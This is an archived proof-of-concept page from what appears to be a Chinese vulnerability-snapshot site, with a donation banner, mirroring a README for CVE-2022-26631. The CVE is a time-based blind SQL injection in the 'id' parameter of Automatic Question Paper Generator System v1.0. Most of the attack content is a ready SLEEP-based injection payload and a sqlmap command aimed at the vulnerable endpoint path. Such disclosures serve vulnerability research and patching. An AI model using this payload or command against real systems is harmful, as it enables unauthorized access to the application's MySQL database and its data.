目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1000

100.0%

CVE-2022-26631 PoC — ResearchGate Automatic Question Paper Generator System SQL注入漏洞

来源
关联漏洞
标题:ResearchGate Automatic Question Paper Generator System SQL注入漏洞 (CVE-2022-26631)
Description:ResearchGate Automatic Question Paper Generator System是德国ResearchGate公司的一个自动试卷生成系统。 ResearchGate Automatic Question Paper Generator System v1.0版本存在SQL注入漏洞,该漏洞源于GET请求中的id参数可能导致基于时间的SQL盲注漏洞。
Description
CVE-2022-26631 - Automatic Question Paper Generator v1.0 SQLi
介绍
# CVE-2022-26631
CVE-2022-26631 - Automatic Question Paper Generator v1.0 SQLi

# Description
The `id` GET parameter from Automatic Question Paper Generator System v1.0 appears to be vulnerable to Time-Based Blind SQL injection attacks.

# Payload
An attacker could execute the following SQLi payload in order to gain access to the MySQL database.

`id=1' AND (SELECT 2599 FROM (SELECT(SLEEP(5)))eRGe) AND 'YFLg'='YFLg`

For simplicity, an attacker could automate the exploitation use the tool 'sqlmap' with the following command.

`sqlmap -u 'http://target-url/aqpg/users/question_papers/manage_generate_form.php?id=1' --batch`

文件快照

[4.0K] /data/pocs/7863b4d0832c06d4ce1abbc34e857b2a41bdfbdc └── [ 630] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。